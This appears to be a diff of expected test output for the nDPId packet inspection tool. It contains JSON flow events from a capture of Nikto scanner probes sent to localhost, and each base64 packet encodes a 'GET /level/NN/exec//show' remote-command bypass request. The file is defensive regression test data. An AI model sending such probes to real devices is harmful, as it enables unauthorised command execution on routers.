00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} 
